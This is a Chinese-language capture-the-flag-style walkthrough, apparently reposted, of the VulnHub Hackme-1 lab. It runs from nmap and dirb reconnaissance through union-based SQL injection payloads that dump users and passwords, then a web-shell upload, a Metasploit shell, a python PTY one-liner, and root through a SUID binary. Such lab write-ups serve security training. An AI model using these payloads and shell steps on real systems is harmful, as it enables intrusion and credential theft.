Hackme-1靶机
生活随笔
收集整理的這篇文章主要介紹了
Hackme-1靶机
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
一、靶場介紹
????????1.下載地址:https://www.vulnhub.com/entry/hackme-1,330/
????????2.將靶機網絡適配器改為僅主機模式
?????????3. 啟動靶機
二、信息收集
1、主機發現
nmap -sn 192.168.139.1/24
2.查看端口開放情況,發現其22、80端口開放? ?
?nmap 192.168.139.128
?
3.靶機目錄掃描?
? ? ? dirb http://192.168.139.128
?
三、滲透流程
sql注入
1、登錄主頁發現登錄頁面,而且還可以注冊用戶
?
2.注冊用戶:admin/123456
3.登錄
4.查看是否有sql注入,點擊search可以查看所有信息
5.驗證sql注入 Windows OS' and 1=1#
Windows OS' and 1=2#,由此看出存在字符型(單引號)sql注入
6.判斷字段數 Windows OS' order by 3#
Windows OS' order by 4#,判斷字符數為3
7.判斷顯示位置:-1' union select 1,2,3#
8.查看當前數據庫位置:-1' union select database(),2,3#
9.查看webapphacking庫所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
10.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
11.查看表中user,password字段數據:-1' union select group_concat(user),group_concat(pasword),3 from users#
12.將密碼進行MD5解密
四、文件上傳
1.使用superadmin用戶登錄 密碼:Uncrackable,發現其存在文件上傳
??
2.上傳phpinfo文件進行驗證,發現上傳成功
3.嘗試上傳一句話木馬,頁面回顯空白,上傳成功
??
4.嘗試使用蟻劍連接
5.Kali生成木馬文件
6.將木馬文件上傳至靶機中
7.kali開啟msf監聽
8.蟻劍中運行木馬文件
9.成功獲取shell
10.切換到shell,輸入whoami可查看具體信息
11.獲取shell后切換到python終端,輸入python -c 'import pty;pty.spawn("/bin/bash")'
12.跳轉到home/legacy目錄下,ls發現 ./touchmenot文件
??
13.輸入 ./touchmenot,運行獲得root
總結
以上是生活随笔為你收集整理的Hackme-1靶机的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: SpringBoot搭建的项目上传文件时
- 下一篇: Spring中出现:“Failed to